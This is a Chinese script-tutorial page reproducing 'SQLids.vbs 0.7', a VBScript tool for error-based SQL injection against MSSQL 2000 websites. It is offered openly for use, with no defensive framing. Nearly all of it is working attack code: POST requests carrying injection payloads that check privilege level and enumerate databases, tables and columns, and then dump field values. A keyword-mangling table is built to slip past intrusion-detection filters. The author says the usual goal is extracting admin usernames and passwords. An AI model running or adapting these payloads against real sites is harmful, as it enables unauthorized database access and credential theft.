当前位置: 首页 > 图文教程 > 脚本技术 > VBScript > SQLids.vbs 0.7(最终版,以后改成gui界面的)

VBScript
VBS中SendKeys的基本应用
VBScript教程 第十四课在VBScript中使用对象
VBScript教程 第十三课 VBScript与窗体
VBScript教程 第十二课VBScript页面的简单样例
VBScript教程 第十一课深入VBScript
VBScript教程 第十课 VBScript编码约定
VBScript教程 第九课VBScript过程
VBScript教程 第八课 使用循环语句
VBScript教程 第七课使用条件语句
VBScript教程 第六课VBScript运算符
VBscript教程 第五课 VBScript常数
VBScript教程 第四课VBScript变量
VBScript教程 第三课VBScript数据类型
VBScript教程 第二课在HTML页面中添加VBscript代码
VBScript教程 第一课什么是VBScript
VBScript的入门学习资料
VBScript语法速查及实例说明
MsgBox函数语言参考
VBS教程:正则表达式简介 -后向引用
VBS教程:正则表达式简介 -选择与编组

VBScript 中的 SQLids.vbs 0.7(最终版,以后改成gui界面的)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-12   浏览: 129 ::
收藏到网摘: n/a

今天搞了个网站,注入点过滤得很变态,工具都不能跑,于是写了这个东东。 是有这个问题的。
第一,应当用正则判断较好。
第二,我用循环加返回结果大于30个长度就退出循环,我相信没有表名和字段名大于30个字母的,但是字段值有可能大于,这个地方解决的不够好。但是一般是用来查后台的管理员的用户名和密码,所以就放弃了。
复制代码 代码如下:

set arg=wscript.arguments
If (LCase(Right(Wscript.fullname,11))="Wscript.Exe") Then
Wscript.Quit
End If
if arg.count=0 then
usage()
Wscript.Quit
End If
Sub usage()
wsh.echo string(79,"*")
wsh.echo "暂且只支持mssql显错模式,直接写url为数字型,写url'为字符型,url里有&请用双引号包含url"
wsh.echo "sqlids v0.7 for mssql2000 with error by lcx"
wsh.echo "以下两个脚本可互相参考"
wsh.echo "http://www.ruanchen.com/"
wsh.echo "http://hi.baidu.com/myvbscript/blog/item/5c9b29124a3fa55bf919b878.html"
wsh.echo "Usage:"
wsh.echo "cscript "&wscript.scriptname&" url limit ||----------->得到当前权限"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 limit"
wsh.echo "cscript "&wscript.scriptname&" url dbname ||----------->得到全部库名"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 dbname"
wsh.echo "cscript "&wscript.scriptname&" url table 库名||-------->得到所给库的全部表名"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 table
master"
wsh.echo "cscript "&wscript.scriptname&" url filed 库名 表名 ||---------->得到所给库所给表的全部字段"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 filed master spt_server_info"
wsh.echo "cscript "&wscript.scriptname&" url result 字段名 库名 表名||--->得所给库、表、字段的字段值"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 result id master sysinfo"
wsh.echo "cscript "&wscript.scriptname&" url search 你要查找的字段名||--->根据关键字查找字段"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 search
pass"
wsh.echo string(79,"*")&vbcrlf
end Sub

Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, "GB2312")
End Function
Function UrlEncode(str)
str = Replace(str," ","%20")
UrlEncode = str
End Function
Function GetBody(url)' xml得到网页源码,可以改成cookie或get提交
On Error Resume Next
Aurl=Split(url,"?") '这是为post提交的
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "post", Aurl(0), False, "", ""
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.setRequestHeader "Accept-Encoding", "gzip, deflate"
.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR
3.0.04506; .NET CLR 1.1.4322)"
.setRequestHeader "Connection", "Keep-Alive"
.setRequestHeader "Cache-Control", "no-cache"
.Send UrlEncode(Aurl(1)) 'post提交
GetBody = .ResponseBody
.abort
End With
Set Retrieval = Nothing
End Function

Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadTExt
objstream.Close
Set objstream = Nothing
End Function

Function ReplaceKeyWord(Value)'绕过ids过虑
Table = "select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in%
ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown-
>shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har|
[k]|fetch->fe%tch|[k]|nExt->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|Exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k]
|sp_->s%p_|[k]|and->a%nd"
Dim i, Relpacement, Temp
Relpacement = Split(Table, "|[k]|")
ReplaceKeyWord = Value
For i = 0 to UBound(Relpacement)
Temp = Split(Relpacement(i), "->")
If UBound(Temp) = 1 Then ReplaceKeyWord = Replace(ReplaceKeyWord, Temp(0), Temp(1))
NExt
End Function

Function result(sHTMLTEMP) '用varchar做关键字分隔网页内容,用正则帅一点,可惜不太会
aHTML = Split(sHTMLTEMP, "varchar")
If(UBound(aHTML) > 0)Then
sHTMLTEMP = aHTML(1)
aHTML = Split(sHTMLTEMP, "'")
sHTMLTEMP = aHTML(1)
End If
result=sHTMLTEMP
End Function
Function Str2HEx(strHEx)'sql的16进制转换函数
Dim sHEx
For i = 1 To Len(strHEx)
sHEx = sHEx & HEx(Asc(Mid(strHEx,i,1)))&"00"
NExt
Str2HEx = "0x"&sHEx
End Function
Function Str2HExtwo(strHEx)'sql的16进制转换函数
Dim sHEx
For i = 1 To Len(strHEx)
sHEx = sHEx & HEx(Asc(Mid(strHEx,i,1)))
NExt
Str2HExtwo = "0x"&sHEx
End Function

Function MoveR(Rstr) '去重复
Dim i,SpStr
SpStr = Split(Rstr,",")
For i = 0 To Ubound(Spstr)
If I = 0 then
MoveR = MoveR & SpStr(i) & ","
Else
If instr(MoveR,SpStr(i))=0 and i=Ubound(Spstr) Then
MoveR = MoveR & SpStr(i)
Elseif instr(MoveR,SpStr(i))=0 Then
MoveR = MoveR & SpStr(i) & ","
End If
End If
NExt
End Function

function page(sql)
page=Replace(getHTTPPage(url&" "&ReplaceKeyWord(sql)),Chr(34),"")
End Function
url=arg(0)
injection =arg(1)

'--------------------------------------以下代码是注入语句,完全不需要引号
select case arg(1)
Case "limit"
body=Replace(getHTTPPage(url),Chr(34),"")
'语句单独提出来,方便以后修改,第一条是sa,第二条是DB_owner
sqlone="and (select is_srvrolemember(0x730079007300610064006D0069006E00))>0--"
sqltwo="and (select is_member(0x640062005F006F0077006E0065007200))>0--"
Bodyone=page(sqlone)
bodytwo=page(sqltwo)
wsh.echo "当前信息:"
If Len(body)=Len(Bodyone) Then wsh.echo "SA"
If Len(body)=Len(Bodytwo) And Len(body)<>Len(Bodyone) Then
wsh.echo "DB_owner"
Else
wsh.echo "PUBLIC"
End If
sqlthtree="and @@servername>0--|and @@version>0--|and user>0--|and db_name()>0--"
rtemp=Split(sqlthtree,"|")
servername=result(page(rtemp(0)))
version=result(page(rtemp(1)))
user=result(page(rtemp(2)))
db_name=result(page(rtemp(3)))
wsh.echo "servername:"&servername
wsh.echo "version:"&version
wsh.echo "user:"& user
wsh.echo "db_name:"& db_name
case "dbname"
i=1
Do
sql="and db_name("&i&")>0--" '暴库名语句
Body = page(sql)
k=InstrRev(body,"varchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0
case "table"
i=1
Do
' 表名语句 agr(2)表示库
sql="and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects
where xtype=0x7500))--"
Body = page(sql)
k=InstrRev(body,"varchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0
case "filed"
sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["&arg(2)&"]..[sy%sob%je%cts] wh%ere name="&Str2HEx(arg(3))&")=0--
"
biaoid=result(page(sqlbiaoid))
biaoid=Replace(biaoid,Chr(124),"")
sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&")=0-- "
k=Replace(result(page(sqlclounmcnt)),Chr(94),"")
wsh.echo "共有列名"&k&"个"
For i=1 To k
sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "&i&" colid,name fr%om ["&arg(2)&"]..[sys%columns] wh%ere
id="&biaoid&" order by colid) t order by colid desc)=0--"
wsh.echo result(page(sqlfiled))
nExt

case "result"
i=1
sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["&arg(3)&"]..["&arg(4)&"] where 1=1)>0--" '暴列的总数目语句
k=result(page(sqlcloum))
k=Replace(k,Chr(94),"")
wsh.echo arg(2)&"字段共有记录数"&k&"个"&vbcrlf
For i=1 To k
sqlneirong= "an%d (se%l%e%c%t to%p 1 ca%st("&arg(2)&" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "&i&" ["&arg(2)&"] fr%om ["&arg(3)&"]..["&arg(4)
&"] wh%ere 1=1 order by ["&arg(2)&"]) t wh%ere 1=1 order by ["&arg(2)&"] desc )=0--"
Body = page(sqlneirong)
wscript.echo Replace(result(body),Chr(94),"")
Next

Case "search"
love=Str2HExtwo(arg(2))
wscript.echo "请稍候,正在查循,暂且只列10条,结果显示为'表名|字段名'格式"
TimeSpend = Timer
For i=1 To 10 '可以根据需要改动这个10
sqlsearch="And (select/* */top/* */1/* */t_name%2bchar(124)%2bc_name/* */from/* */(select/* */top/* */"&i&"/* */object_name(id)/* */as/* */t_name,name/*
*/as/* */c_name/* */from/* */syscolumns/* */where/* */charindEx(cast("&love&"/* */as/* */varchar(2000)),name)%3E0/* */and/* */left(name,1)!=0x40/* */order/*
*/by/* */t_name/* */asc)/* */as/* */T/* */order/* */by/* */t_name/* */desc)>0--"
Body = page(sqlsearch)
body=result(body)
a=a&body&","
NExt
TimeSpend = round(Timer - TimeSpend,2)
wsh.echo MoveR(a)
wsh.echo "用时:" & TimeSpend & "秒."


Case Else
If arg(1)<>"limit" Or arg(1)<>"dbname" Or arg(1)<>"search" Or arg(1)<>"table" Or arg(1)<>"filed" Then
wscript.echo "注意参数"
usage()
End if
end select